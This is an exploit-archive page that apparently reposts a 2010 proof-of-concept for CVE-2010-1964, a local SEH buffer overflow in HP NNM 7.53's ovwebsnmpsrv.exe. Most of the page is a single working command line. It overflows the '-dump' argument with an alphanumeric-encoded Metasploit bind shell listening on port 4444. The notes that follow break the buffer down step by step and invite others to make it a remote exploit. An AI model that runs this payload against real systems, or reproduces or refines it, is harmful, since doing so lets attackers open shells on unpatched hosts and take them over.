Home / os / win7

HP NNM 7.53 ovwebsnmpsrv.exe Buffer Overflow (SEH)

Posted on 07 July 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>HP NNM 7.53 ovwebsnmpsrv.exe Buffer Overflow (SEH)</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>==================================================
HP NNM 7.53 ovwebsnmpsrv.exe Buffer Overflow (SEH)
==================================================


# Exploit Title: HP NNM 7.53 ovwebsnmpsrv.exe Buffer Overflow (SEH)
# Date: 07/06/2010
# Author: bitform
# Software Link: hp.com
# Version: 7.53
# Tested on: Windows XP SP2
# CVE: CVE-2010-1964
 
# Exploit:
 
C:Program FilesHP OpenViewwwwinovwebsnmpsrv.exe -dump AAAAAAAAAAAAUXf-9Tf-9Tf-9TUAAAAAAAAAAAAAAAAAAAAAPYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIIlIxMYC0EPGpCPNiJEP1KbQtLKPRFPLKF2DLNkF2EDNkD2ExFoMgPJDfDqIoEaIPNLElPaQlFbDlGPJaHODMFaIWKRL0QBF7LKBrFpLKQRElFaJpNkQPD8OuIPCDCzEQHPF0LKQXGhNkBxEpEQHSKSElQYLKDtLKFaKfP1KOP1KpLlIQJoDMGqO7DxM0BUJTFcCMIhGKQmQ4CEKRBxLKBxQ4FaN3E6NkDLPKLKBxELEQJsLKC4NkC1HPMYG4GTQ4QKQKCQPYQJCaKOIpBxQOCjLKDRHkMVCmE8GCFRGpC0E8BWCCP2CoPTPhPLQgFFDGIoJuOHNpEQGpGpQ9HDPTBpBHFIMPPkGpIoKePPPPPPBpG0F0G0F0QxJJDOKoM0KOHULIO7DqIKQCE8C2GpFqQLK9HfPjDPCfCgPhIRIKEgE7KOIEBsBwBHH7KYDxKOIoJuQCCcF7PhQdJLEkKQKON5QGOyIWE8QeBNPMQqKON5BHQsBME4C0NiJCBwBwQGP1L6PjGbPYCfKRImBFO7G4FDGLC1FaNmPDGTFpKvGpG4QDPPCfQFF6CvBvBnBvF6QCQFBHQiJlEoNfKOJuK9IpBnF6CvIoP0BHDHOwGmCPKOHUMkJPH5MrF6BHMvJ5MmOmKOJuElDFCLFjOpKKM0BUEUOKG7GcQbBOCZC0CcKON5DJAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYY5AZCCX,Y,XPSX-1UUU-1PPP-N_ZZPSX-zzzd-{zzd-{zzMPCCCCCCCCCCCCCCCCCCCCCCCCCCCC
 
# Notes:
 
This is the result of my research on CVE-2010-1964. Finding this vulnerability locally was trivial but getting
a remote exploit via jovgraph.exe never quite worked out for me. I'm hoping someone will be able to make this
a practical remote exploit. :D
 
Overflowing many of the other command line options will overwrite SEH as well (e.g. -demo)
 
Explanation of buffer:
 
&quot;UXf-9Tf-9Tf-9TU&quot;
Carve out EAX as the base register for the alphanumeric shellcode
 
&quot;PYIIIIIIIIIIIIIIII7QZ&quot;...
Alphanumeric bind shell
# ./msfpayload windows/shell_bind_tcp LPORT=4444 RHOST=127.0.0.1 R | ./msfencode BufferRegister=EAX -e x86/alpha_mixed -t raw
 
   / Overwrite SEH 
  [  ]
&quot;YY5AZCCX,Y,XPSX-1UUU-1PPP-N_ZZPSX-zzzd-{zzd-{zzMP&quot;
      [                                           ]
                         / Carve out non-conditional jmp to carve EAX code


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-07-07]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP